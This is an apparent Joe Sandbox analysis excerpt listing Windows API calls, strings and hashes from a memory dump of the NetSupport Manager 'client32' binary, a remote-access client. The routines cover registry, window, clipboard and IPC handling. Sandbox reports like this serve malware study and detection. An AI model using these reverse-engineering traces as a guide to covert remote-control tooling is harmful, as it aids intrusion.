                                                                              • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                              • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                              • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                              • API String ID: 2999768849-588814233
                                                                              • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                              • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                              • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                              • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101D750
                                                                              • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                              • _memset.LIBCMT ref: 1101D77A
                                                                              • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                              • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                              • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                              • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                              • String ID: NSMChatSizeWnd
                                                                              • API String ID: 2883038198-4119039562
                                                                              • Opcode ID: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                              • Instruction ID: fd9a6760edc21507823d477136c8404e9cdc8da2703fb475a86e8304a251f150
                                                                              • Opcode Fuzzy Hash: 4a493ff1cb6d2adaa5d9d5f451e97c7e27dd5ac9b7e193787943fcead3d8059b
                                                                              • Instruction Fuzzy Hash: 8E3130B5D0120DAFDB10DFA5DDC4AEEF7B8FB48218F20452DE82AB6240D7356905CB50
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 110334CA
                                                                              • _memset.LIBCMT ref: 11033501
                                                                              • RegisterClipboardFormatA.USER32(?), ref: 11033529
                                                                              • GetLastError.KERNEL32 ref: 11033534
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • _memmove.LIBCMT ref: 1103357E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                                              • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                                              • API String ID: 2414640225-228067302
                                                                              • Opcode ID: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                              • Instruction ID: 82b91b0b5d2de246ea4be34add9884a3f681a3774444f6be8ea8d99c2c4d4bf7
                                                                              • Opcode Fuzzy Hash: 4806dd2360c89aae23173ee0d242eaa753ef1fe839067c9f549e94da566ade4d
                                                                              • Instruction Fuzzy Hash: C7316F79A00706ABD714DF64C881B6AF3F4FF88708F14C558E9599B341EB71E954CB90
                                                                              APIs
                                                                              Strings
                                                                              • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11027098
                                                                              • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11027127
                                                                              • HandleIPC ret %x, took %d ms, xrefs: 11027110
                                                                              • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11027079
                                                                              • Warning. IPC msg but no wnd. Waiting..., xrefs: 110270BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Sleep
                                                                              • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                                              • API String ID: 4250438611-314227603
                                                                              • Opcode ID: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction ID: 36f6635ed5369738cce6f54d2d5b10a636314f1ad60547d54338f1edfc411986
                                                                              • Opcode Fuzzy Hash: cf922524ba4b939dac619c14ad9c82c8a96acbc09ed8cabbbd0cfb614c38f24c
                                                                              • Instruction Fuzzy Hash: FF21C379E01619EBD321DFA5DCD0EABF7ADEB95218F104529F81943600DB31AC44C7A2
                                                                              APIs
                                                                              • _strncmp.LIBCMT ref: 1100953A
                                                                              • _strncmp.LIBCMT ref: 1100954A
                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,EE49F673), ref: 110095EB
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110095A0, 110095C8
                                                                              • IsA(), xrefs: 110095A5, 110095CD
                                                                              • http://, xrefs: 11009535, 11009548
                                                                              • https://, xrefs: 1100952F
                                                                              • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 11009571
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _strncmp$FileWrite
                                                                              • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                              • API String ID: 1635020204-3154135529
                                                                              • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                              • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                              • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                              APIs
                                                                              • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                              • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                              • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                              • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                              • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                              • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$ClassMessageNamePostTextWindow
                                                                              • String ID: #32770$Tapiexe
                                                                              • API String ID: 3170390011-3313516769
                                                                              • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                              • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                              • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                              • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                              • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                              • GetDlgItem.USER32(?,?), ref: 11023414
                                                                              • SetFocus.USER32(00000000), ref: 11023417
                                                                              • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1605826578-1986719024
                                                                              • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                              • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                              • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                              • _memset.LIBCMT ref: 1114515E
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                              • CreatePopupMenu.USER32 ref: 111451AA
                                                                              • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                              • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                              • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 74472576-4108050209
                                                                              • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                              • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 11039768
                                                                              • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                              • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                              • PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
                                                                              • GetParent.USER32(?), ref: 110397B6
                                                                              • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                              • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                              • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                              • String ID:
                                                                              • API String ID: 818519836-0
                                                                              • Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                              • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                              • Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                              • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 11153763
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                              • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                              • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                              • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                              • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                              • String ID:
                                                                              • API String ID: 602542589-0
                                                                              • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                              • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                              • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                              • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                              APIs
                                                                                • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,75A73760,00000000,111F1590,?,110CD955,00000000,75A73760), ref: 111103E8
                                                                                • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,75A8A1D0,00000000,?,110CD955,00000000,75A73760), ref: 11110408
                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                              • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                              • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                              • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                              • DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 1497311044-0
                                                                              • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                              • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                              • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                              • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                              APIs
                                                                              • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                              • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                              • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                              • SetBkColor.GDI32(?,?), ref: 11113615
                                                                              • SetTextColor.GDI32(?,?), ref: 11113620
                                                                              • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                              • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                              • String ID:
                                                                              • API String ID: 1094208222-0
                                                                              • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                              • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                              • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                              • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                              • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                              • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                              • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                              • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                              • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                              • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID:
                                                                              • API String ID: 190572456-0
                                                                              • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                              • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                              • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                              • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                              APIs
                                                                              • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9A9
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9B6
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9C3
                                                                              • SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9DF
                                                                              • SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9FB
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109DA08
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$Event$FileUnmapView
                                                                              • String ID:
                                                                              • API String ID: 2427653990-0
                                                                              • Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                              • Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
                                                                              • Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                              • Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _memset.LIBCMT ref: 110433A9
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$__wcstoi64_memset
                                                                              • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                              • API String ID: 3760389471-710950153
                                                                              • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                              • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                              APIs
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                              • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                              • GetTextColor.GDI32(?), ref: 1101F645
                                                                                • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                              • String ID: VUUU$VUUU
                                                                              • API String ID: 179481525-3149182767
                                                                              • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                              • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                              • Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                              • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                              APIs
                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Directory$FolderPathSystemWindows
                                                                              • String ID: "%PROG%$%SYS%$%WIN%$c:\program files
                                                                              • API String ID: 1538031420-1992112792
                                                                              • Opcode ID: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                              • Instruction ID: 2623f2ed80b282b5754acc89838a0d53b3ad1afe3f6d6f3bb9299b9b15bf7866
                                                                              • Opcode Fuzzy Hash: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                              • Instruction Fuzzy Hash: 50412775E0461A5FCB15CE348C94BEAB7E9EF8930DF0041E8E899D7644EBB59944CB80
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                              • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                              • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                              Strings
                                                                              Memory Dump Source
